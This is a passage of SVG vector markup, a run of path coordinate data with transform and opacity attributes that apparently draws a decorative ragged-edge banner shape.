92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 